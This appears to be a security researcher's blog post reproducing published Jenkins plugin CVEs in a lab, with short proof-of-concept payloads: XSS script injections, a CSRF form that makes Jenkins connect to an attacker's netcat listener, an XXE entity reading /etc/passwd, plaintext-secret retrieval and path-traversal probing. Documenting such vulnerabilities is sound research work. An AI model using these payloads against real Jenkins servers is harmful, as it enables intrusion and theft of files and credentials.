<div id="contact-list" class="text-center">
	<ul class="list-unstyled list-inline">
		
		<li>
			<a class="btn btn-default btn-sm" href="https://github.com/Liodeus">
				<i class="fa fa-github-alt fa-lg"></i>
			</a>
		</li>
		
		
		<li>
			<a class="btn btn-default btn-sm" href="https://linkedin.com/in/thibault-galbourdin-9a4998144">
				<i class="fa fa-linkedin fa-lg"></i>
			</a>
		</li>
		
		
		<li>
			<a class="btn btn-default btn-sm" href="mailto:thibaultgalbourdin@gmail.com">
				<i class="fa fa-envelope fa-lg"></i>
			</a>
		</li>
		
		<li>
			<a class="btn btn-default btn-sm" href="https://www.hackthebox.eu/profile/26480">
				<i class="fa fa-stop" aria-hidden="true"></i>
			</a>
		</li>
	</ul>
</div>
<!-- sidebar.html end -->

	</div>

	<div class="col-sm-9 col-sm-offset-3">
		<div class="page-header">
  <h1>Jenkins - Vulnerabilities analysis part 4 </h1>
</div>
	
<article>

	<div class="col-sm-10">
	 <span class="post-date">
	   
	   March 
	   20th,
	   
	   2022
	 </span>
	  <div class="article_body">
	  <p>This is still in redaction. I’ll add more content when I have found plugins vulnerable and can reproduce the vulnerability. The exploit part will be more verbose, for now that will do :)</p>

<p>The docker image, which will be the lab, with all the plugins already installed, will be available soon.</p>

<p>Search for vulnerable plugins :</p>
<ul>
  <li><a href="https://www.jenkins.io/security/advisories/">https://www.jenkins.io/security/advisories/</a></li>
</ul>

<hr>

<h2 id="xss">XSS</h2>
<h3 id="stored-xss-vulnerability-in-dashboard-view-plugin">Stored XSS vulnerability in Dashboard View Plugin</h3>
<ul>
  <li>CVE-2022-27197
    <ul>
      <li>Dashboard View Plugin 2.18</li>
      <li><a href="https://plugins.jenkins.io/dashboard-view/">https://plugins.jenkins.io/dashboard-view/</a></li>
      <li>Requires Jenkins 2.277.1</li>
    </ul>
  </li>
</ul>

<h4 id="exploit">Exploit</h4>
<ul>
  <li>New view - name it - select dashboard</li>
  <li>add a Portlets at the top of the page</li>
  <li>Iframe source url –&gt; javascript:alert(“Liodeus”)</li>
</ul>

<h3 id="reflected-xss-vulnerability-in-wall-display-master-project-plugin">Reflected XSS vulnerability in Wall Display Master Project Plugin</h3>
<ul>
  <li>CVE-2019-10376
    <ul>
      <li>Wall Display Master Project 0.6.34</li>
      <li><a href="https://plugins.jenkins.io/jenkinswalldisplay/">https://plugins.jenkins.io/jenkinswalldisplay/</a></li>
      <li>Requires Jenkins 1.580</li>
    </ul>
  </li>
</ul>

<h4 id="exploit-1">Exploit</h4>
<ul>
  <li>click Wall Display</li>
  <li><code class="language-plaintext highlighter-rouge">customTheme=&lt;/style&gt;&lt;script&gt;alert("Liodeus")&lt;/script&gt;</code></li>
</ul>

<hr>

<h2 id="csrf">CSRF</h2>
<h3 id="csrf-vulnerability-in-publish-over-ssh-plugin">CSRF vulnerability in Publish Over SSH Plugin</h3>
<ul>
  <li>CVE-2022-23111
    <ul>
      <li>Publish Over SSH Plugin 1.22</li>
      <li>https://plugins.jenkins.io/publish-over-ssh/</li>
      <li>Requires Jenkins 2.263.1</li>
    </ul>
  </li>
</ul>

<h4 id="exploit-2">Exploit</h4>
<ul>
  <li>sudo netcat -lvnp 22</li>
  <li>host this html on a webpage (change the IP by yours)</li>
</ul>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;html&gt;</span>
  <span class="nt">&lt;body&gt;</span>
  <span class="nt">&lt;script&gt;</span><span class="nx">history</span><span class="p">.</span><span class="nx">pushState</span><span class="p">(</span><span class="dl">''</span><span class="p">,</span> <span class="dl">''</span><span class="p">,</span> <span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">)</span><span class="nt">&lt;/script&gt;</span>
    <span class="nt">&lt;form</span> <span class="na">action=</span><span class="s">"http://localhost:8080/descriptorByName/jenkins.plugins.publish_over_ssh.BapSshHostConfiguration/testConnection"</span><span class="nt">&gt;</span>
      <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"name"</span> <span class="na">value=</span><span class="s">"test"</span> <span class="nt">/&gt;</span>
      <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"hostname"</span> <span class="na">value=</span><span class="s">"192&amp;#46;168&amp;#46;1&amp;#46;117"</span> <span class="nt">/&gt;</span>
      <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"username"</span> <span class="na">value=</span><span class="s">"test"</span> <span class="nt">/&gt;</span>
      <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"port"</span> <span class="na">value=</span><span class="s">"22"</span> <span class="nt">/&gt;</span>
      <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Submit request"</span> <span class="nt">/&gt;</span>
    <span class="nt">&lt;/form&gt;</span>
  <span class="nt">&lt;/body&gt;</span>
<span class="nt">&lt;/html&gt;</span>
</code></pre></div></div>
<ul>
  <li>Go to the webpage, click on the button Submit request</li>
  <li>If you already are connected to Jenkins, you should see a connection on your listener</li>
  <li>If you are not connected, Jenkins ask you to connect, then the request get executed and you should see a connection on your listener</li>
</ul>

<hr>

<h2 id="xxe">XXE</h2>
<h3 id="xxe-vulnerability-in-performance-plugin">XXE vulnerability in Performance Plugin</h3>
<ul>
  <li>CVE-2021-21701
    <ul>
      <li>pom2config plugin 1.2</li>
      <li><a href="https://plugins.jenkins.io/pom2config/">https://plugins.jenkins.io/pom2config/</a></li>
      <li>Requires Jenkins 1.509.1</li>
    </ul>
  </li>
</ul>

<h4 id="exploit-3">Exploit</h4>
<ul>
  <li>Create a new freestyle project</li>
  <li>Go on it - click Pom2Config</li>
  <li>Craft a .xml with exploit</li>
</ul>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span>
<span class="cp">&lt;!DOCTYPE data [
&lt;!ENTITY xxe SYSTEM "/etc/passwd" &gt;</span>]&gt;
<span class="nt">&lt;project</span> <span class="na">xmlns=</span><span class="s">"http://maven.apache.org/POM/4.0.0"</span> <span class="na">xmlns:xsi=</span><span class="s">"http://www.w3.org/2001/XMLSchema-instance"</span> <span class="na">xsi:schemaLocation=</span><span class="s">"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"</span><span class="nt">&gt;</span>
  <span class="nt">&lt;description&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/description&gt;</span>
<span class="nt">&lt;/project&gt;</span>
</code></pre></div></div>

<hr>

<h2 id="secret-stored-in-plain-text">Secret stored in plain text</h2>
<h3 id="client-secret-stored-in-plain-text-by-gitlab-authentication-plugin">Client Secret stored in plain text by GitLab Authentication Plugin</h3>
<ul>
  <li>CVE-2022-27206
    <ul>
      <li>GitLab Authentication Plugin 1.13</li>
      <li><a href="https://plugins.jenkins.io/gitlab-oauth/">https://plugins.jenkins.io/gitlab-oauth/</a></li>
      <li>Requires Jenkins 2.249.1</li>
    </ul>
  </li>
</ul>

<h4 id="exploit-4">Exploit</h4>
<ul>
  <li>Dashboard - Configure Global Security - Security Realm - GitLab Authentication Plugin</li>
  <li>Client ID –&gt; ThisIsASecretID</li>
  <li>Client Secret –&gt; ThisIsASecretPASSWORD</li>
  <li>docker ps - get docker:dind name</li>
  <li>docker exec -it pensive_shannon /bin/bash</li>
  <li>cd /var/jenkins_home</li>
  <li>cat config.xml</li>
  <li>Secret in plain text</li>
</ul>

<hr>

<h2 id="path-traversal">Path traversal</h2>
<h3 id="path-traversal-vulnerability-in-publish-over-ssh-plugin">Path traversal vulnerability in Publish Over SSH Plugin</h3>
<ul>
  <li>CVE-2022-23113
    <ul>
      <li>Publish Over SSH Plugin 1.22</li>
      <li>https://plugins.jenkins.io/publish-over-ssh/</li>
      <li>Requires Jenkins 2.263.1</li>
    </ul>
  </li>
</ul>

<h4 id="exploit-5">Exploit</h4>
<ul>
  <li>Manage Jenkins - Configure System - Go to “Publish over SSH”</li>
  <li>In the “Path to key” box, enter a file to check for existance</li>
  <li>If the file doesn’t exist on the system : No such file : ‘fileName’</li>
  <li>If the file exist : No error</li>
</ul>

<hr>

<h2 id="bonus">Bonus</h2>
<h3 id="open-redirect-vulnerability-in-gitlab-authentication-plugin">Open redirect vulnerability in GitLab Authentication Plugin</h3>
<ul>
  <li>CVE-2022-25196
    <ul>
      <li>GitLab Authentication Plugin 1.13</li>
      <li><a href="https://plugins.jenkins.io/gitlab-oauth/">https://plugins.jenkins.io/gitlab-oauth/</a></li>
      <li>Requires Jenkins 2.249.1</li>
    </ul>
  </li>
</ul>

<h4 id="exploit-6">Exploit</h4>
<ul>
  <li>Dashboard - Configure Global Security - Security Realm - GitLab Authentication Plugin</li>
  <li>GitLab Web URI –&gt; URL</li>
  <li>Save</li>
  <li>Go to localhost:8080</li>
  <li>You are redirect to URL</li>
</ul>

	  </div>

		  

		
		<ul class="list-inline">
		  <li><i class="fa fa-tags"></i></li>
		  
		  
			 
				<li>
					<a href="/tags.html#Jenkins-ref">
					Jenkins <span>(4)</span>
					,
					</a>
				</li>
			 
				<li>
					<a href="/tags.html#Security-ref">
					Security <span>(8)</span>
					,
					</a>
				</li>
			 
				<li>
					<a href="/tags.html#CI-ref">
					CI <span>(4)</span>
					,
					</a>
				</li>
			 
				<li>
					<a href="/tags.html#CD-ref">
					CD <span>(4)</span>
					
					</a>
				</li>
			
		  
		  
		</ul>
		  

		<hr>

		<div>
      <section class="share col-sm-6">
        <h4 class="section-title">Share Post</h4>
        <a class="btn btn-default btn-sm twitter" href="https://twitter.com/intent/tweet?text=Write-up from Liodeus on Jenkins - Vulnerabilities analysis part 4 : https://liodeus.github.io/2022/03/20/Jenkins-Vulnerabilities-analysis-part-4.html&amp;hashtags=Jenkins,Security,CI,CD," onclick="window.open(this.href, 'twitter-share', 'width=550,height=235');return false;">
          <i class="fa fa-twitter fa-lg"></i>
          Twitter
        </a>
        <a class="btn btn-default btn-sm facebook" href="https://www.facebook.com/sharer/sharer.php" onclick="window.open(this.href, 'facebook-share','width=580,height=296');return false;">
          <i class="fa fa-facebook fa-lg"></i>
          Facebook
        </a>
        <a class="btn btn-default btn-sm gplus" onclick="window.open('https://plus.google.com/share?url='+window.location.href, 'google-plus-share', 'width=490,height=530');return false;">
          <i class="fa fa-google-plus fa-lg"></i>
          Google+
        </a>
      </section>
    </div>

    <div class="clearfix"></div>

		<ul class="pager">
		  
		  <li class="previous"><a href="/2022/03/19/Jenkins-Vulnerabilities-analysis-part-3.html" title="Jenkins - Vulnerabilities analysis part 3">← Previous</a></li>
		  
		  
			<li class="next disabled"><a>Next →</a>
		  
		</li></ul>

		<hr>
	</div>
	
	<div class="col-sm-2 sidebar-2">
	
	</div>
</article>
<div class="clearfix"></div>





		<footer>
			<hr>
			<p>
				© 2022 Liodeus.
			</p>
		</footer>
	</div>

	<script async="" src="https://www.google-analytics.com/analytics.js"></script><script type="text/javascript" src="/assets/resources/jquery/jquery.min.js"></script>
	<script type="text/javascript" src="/assets/resources/bootstrap/js/bootstrap.min.js"></script>
	<script type="text/javascript" src="/assets/js/app.js"></script>





<!-- Asynchronous Google Analytics snippet -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'Liodeus', 'auto');
  ga('send', 'pageview');
</script>

<textarea id="BFI_DATA" style="width: 1px; height: 1px; display: none;"></textarea><title> </title><div id="WidgetFloaterPanels" translate="no" style="display: none; text-align: left; direction: ltr; visibility: hidden;" class="LTRStyle"> <div id="WidgetFloater" style="display: none" onmouseover="Microsoft.Translator.OnMouseOverFloater()" onmouseout="Microsoft.Translator.OnMouseOutFloater()"> <div id="WidgetLogoPanel"> <span id="WidgetTranslateWithSpan"><span>TRANSLATE with </span><img id="FloaterLogo"></span> <span id="WidgetCloseButton" title="Exit Translation" onclick="Microsoft.Translator.FloaterOnClose()">x</span></div> <div id="LanguageMenuPanel"> <div class="DDStyle_outer"><input name="LanguageMenu_svid" type="text" id="LanguageMenu_svid" style="display:none;" autocomplete="on" value="en" onclick="this.select()"> <input name="LanguageMenu_textid" type="text" id="LanguageMenu_textid" style="display:none;" autocomplete="on" onclick="this.select()"> <span onselectstart="return false" tabindex="0" class="DDStyle" id="__LanguageMenu_header" onclick="return LanguageMenu &amp;&amp; !LanguageMenu.Show('__LanguageMenu_popup', event);" onkeydown="return LanguageMenu &amp;&amp; !LanguageMenu.Show('__LanguageMenu_popup', event);">English</span> <div style="position:relative;text-align:left;left:0;"><div style="position:absolute;width:;left:0px;"><div class="DDStyle" style="display:none;" id="__LanguageMenu_popup"> <table id="LanguageMenu" border="0"> <tbody><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('ar');" ondragstart="LanguageMenu.ondragstart(event);" href="#ar">Arabic</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('he');" ondragstart="LanguageMenu.ondragstart(event);" href="#he">Hebrew</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('pl');" ondragstart="LanguageMenu.ondragstart(event);" href="#pl">Polish</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('bg');" ondragstart="LanguageMenu.ondragstart(event);" href="#bg">Bulgarian</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('hi');" ondragstart="LanguageMenu.ondragstart(event);" href="#hi">Hindi</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('pt');" ondragstart="LanguageMenu.ondragstart(event);" href="#pt">Portuguese</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('ca');" ondragstart="LanguageMenu.ondragstart(event);" href="#ca">Catalan</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('mww');" ondragstart="LanguageMenu.ondragstart(event);" href="#mww">Hmong Daw</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('ro');" ondragstart="LanguageMenu.ondragstart(event);" href="#ro">Romanian</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('zh-CHS');" ondragstart="LanguageMenu.ondragstart(event);" href="#zh-CHS">Chinese Simplified</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('hu');" ondragstart="LanguageMenu.ondragstart(event);" href="#hu">Hungarian</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('ru');" ondragstart="LanguageMenu.ondragstart(event);" href="#ru">Russian</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('zh-CHT');" ondragstart="LanguageMenu.ondragstart(event);" href="#zh-CHT">Chinese Traditional</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('id');" ondragstart="LanguageMenu.ondragstart(event);" href="#id">Indonesian</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('sk');" ondragstart="LanguageMenu.ondragstart(event);" href="#sk">Slovak</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('cs');" ondragstart="LanguageMenu.ondragstart(event);" href="#cs">Czech</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('it');" ondragstart="LanguageMenu.ondragstart(event);" href="#it">Italian</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('sl');" ondragstart="LanguageMenu.ondragstart(event);" href="#sl">Slovenian</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('da');" ondragstart="LanguageMenu.ondragstart(event);" href="#da">Danish</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('ja');" ondragstart="LanguageMenu.ondragstart(event);" href="#ja">Japanese</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('es');" ondragstart="LanguageMenu.ondragstart(event);" href="#es">Spanish</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('nl');" ondragstart="LanguageMenu.ondragstart(event);" href="#nl">Dutch</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('tlh');" ondragstart="LanguageMenu.ondragstart(event);" href="#tlh">Klingon</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('sv');" ondragstart="LanguageMenu.ondragstart(event);" href="#sv">Swedish</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('en');" ondragstart="LanguageMenu.ondragstart(event);" href="#en">English</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('ko');" ondragstart="LanguageMenu.ondragstart(event);" href="#ko">Korean</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('th');" ondragstart="LanguageMenu.ondragstart(event);" href="#th">Thai</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('et');" ondragstart="LanguageMenu.ondragstart(event);" href="#et">Estonian</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('lv');" ondragstart="LanguageMenu.ondragstart(event);" href="#lv">Latvian</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('tr');" ondragstart="LanguageMenu.ondragstart(event);" href="#tr">Turkish</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('fi');" ondragstart="LanguageMenu.ondragstart(event);" href="#fi">Finnish</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('lt');" ondragstart="LanguageMenu.ondragstart(event);" href="#lt">Lithuanian</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('uk');" ondragstart="LanguageMenu.ondragstart(event);" href="#uk">Ukrainian</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('fr');" ondragstart="LanguageMenu.ondragstart(event);" href="#fr">French</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('ms');" ondragstart="LanguageMenu.ondragstart(event);" href="#ms">Malay</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('ur');" ondragstart="LanguageMenu.ondragstart(event);" href="#ur">Urdu</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('de');" ondragstart="LanguageMenu.ondragstart(event);" href="#de">German</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('mt');" ondragstart="LanguageMenu.ondragstart(event);" href="#mt">Maltese</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('vi');" ondragstart="LanguageMenu.ondragstart(event);" href="#vi">Vietnamese</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('el');" ondragstart="LanguageMenu.ondragstart(event);" href="#el">Greek</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('no');" ondragstart="LanguageMenu.ondragstart(event);" href="#no">Norwegian</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('cy');" ondragstart="LanguageMenu.ondragstart(event);" href="#cy">Welsh</a></td> </tr><tr> <td><a tabindex="-1" onclick="return LanguageMenu.onclick('ht');" ondragstart="LanguageMenu.ondragstart(event);" href="#ht">Haitian Creole</a></td><td><a tabindex="-1" onclick="return LanguageMenu.onclick('fa');" ondragstart="LanguageMenu.ondragstart(event);" href="#fa">Persian</a></td><td></td> </tr> </tbody></table> <img alt="" style="height:7px;width:17px;border-width:0px;left:20px;"> </div></div></div></div> <script type="text/javascript"> var LanguageMenu; var LanguageMenu_keys=["ar","bg","ca","zh-CHS","zh-CHT","cs","da","nl","en","et","fi","fr","de","el","ht","he","hi","mww","hu","id","it","ja","tlh","ko","lv","lt","ms","mt","no","fa","pl","pt","ro","ru","sk","sl","es","sv","th","tr","uk","ur","vi","cy"]; var LanguageMenu_values=["Arabic","Bulgarian","Catalan","Chinese Simplified","Chinese Traditional","Czech","Danish","Dutch","English","Estonian","Finnish","French","German","Greek","Haitian Creole","Hebrew","Hindi","Hmong Daw","Hungarian","Indonesian","Italian","Japanese","Klingon","Korean","Latvian","Lithuanian","Malay","Maltese","Norwegian","Persian","Polish","Portuguese","Romanian","Russian","Slovak","Slovenian","Spanish","Swedish","Thai","Turkish","Ukrainian","Urdu","Vietnamese","Welsh"]; var LanguageMenu_callback=function(){ }; var LanguageMenu_popupid='__LanguageMenu_popup'; </script> </div> <div id="CTFLinksPanel"> <span id="ExternalLinksPanel"><a id="HelpLink" title="Help" target="_blank" href="https://go.microsoft.com/?linkid=9722454"> <img id="HelpImg"></a> <a id="EmbedLink" href="javascript:Microsoft.Translator.FloaterShowEmbed()" title="Get this widget for your own site"> <img id="EmbedImg"></a> <a id="ShareLink" title="Share translated page with friends" href="javascript:Microsoft.Translator.FloaterShowSharePanel()"> <img id="ShareImg"></a> </span> </div> <div id="FloaterProgressBar"> <span id="ProgressFill"></span> </div> </div> <div id="WidgetFloaterCollapsed" style="display: none" onmouseover="Microsoft.Translator.OnMouseOverFloater()"> <span>TRANSLATE with </span><img id="CollapsedLogoImg"></div> <div id="FloaterSharePanel" style="display: none"> <div id="ShareTextDiv"> <span id="ShareTextSpan"> COPY THE URL BELOW </span> </div> <div id="ShareTextboxDiv"> <input name="ShareTextbox" type="text" id="ShareTextbox" readonly="readonly" onclick="this.select()"> <!--a id="TwitterLink" title="Share on Twitter"> <img id="TwitterImg" /></a> <a-- id="FacebookLink" title="Share on Facebook"> <img id="FacebookImg" /></a--> <a id="EmailLink" title="Email this translation"> <img id="EmailImg"></a> </div> <div id="ShareFooter"> <span id="ShareHelpSpan"><a id="ShareHelpLink"> <img id="ShareHelpImg"></a></span> <span id="ShareBackSpan"><a id="ShareBack" href="javascript:Microsoft.Translator.FloaterOnShareBackClick()" title="Back To Translation"> Back</a></span> </div> <input name="EmailSubject" type="hidden" id="EmailSubject" value="Check out this page in {0} translated from {1}"> <input name="EmailBody" type="hidden" id="EmailBody" value="Translated: {0}%0d%0aOriginal: {1}%0d%0a%0d%0aAutomatic translation powered by Microsoft® Translator%0d%0ahttp://www.bing.com/translator?ref=MSTWidget"> <input type="hidden" id="ShareHelpText" value="This link allows visitors to launch this page and automatically translate it to {0}."> </div> <div id="FloaterEmbed" style="display: none"> <div id="EmbedTextDiv"> <span id="EmbedTextSpan">EMBED THE SNIPPET BELOW IN YOUR SITE</span> <a id="EmbedHelpLink" title="Copy this code and place it into your HTML."> <img id="EmbedHelpImg"></a> </div> <div id="EmbedTextboxDiv"> <input name="EmbedSnippetTextBox" type="text" id="EmbedSnippetTextBox" readonly="readonly" value="<div id='MicrosoftTranslatorWidget' class='Dark' style='color:white;background-color:#555555'></div><script type='text/javascript'>setTimeout(function(){var s=document.createElement('script');s.type='text/javascript';s.charset='UTF-8';s.src=((location &amp;&amp; location.href &amp;&amp; location.href.indexOf('https') == 0)?'https://ssl.microsofttranslator.com':'http://www.microsofttranslator.com')+'/ajax/v3/WidgetV3.ashx?siteData=ueOIGRSKkd965FeEGM5JtQ**&amp;ctf=true&amp;ui=true&amp;settings=manual&amp;from=en';var p=document.getElementsByTagName('head')[0]||document.documentElement;p.insertBefore(s,p.firstChild); },0);</script>" onclick="this.select()"> </div> <div id="EmbedNoticeDiv"><span id="EmbedNoticeSpan">Enable collaborative features and customize widget: <a href="http://www.bing.com/widget/translator" target="_blank">Bing Webmaster Portal</a></span></div> <div id="EmbedFooterDiv"><span id="EmbedBackSpan"><a href="javascript:Microsoft.Translator.FloaterOnEmbedBackClick()" title="Back To Translation">Back</a></span></div> </div> <script type="text/javascript"> var intervalId = setInterval(function () { if (MtPopUpList) { LanguageMenu = new MtPopUpList(); var langMenu = document.getElementById(LanguageMenu_popupid); var origLangDiv = document.createElement("div"); origLangDiv.id = "OriginalLanguageDiv"; origLangDiv.innerHTML = "<span id='OriginalTextSpan'>ORIGINAL: </span><span id='OriginalLanguageSpan'></span>"; langMenu.appendChild(origLangDiv); LanguageMenu.Init('LanguageMenu', LanguageMenu_keys, LanguageMenu_values, LanguageMenu_callback, LanguageMenu_popupid); window["LanguageMenu"] = LanguageMenu; clearInterval(intervalId); } }, 1); </script> </div></body></html>
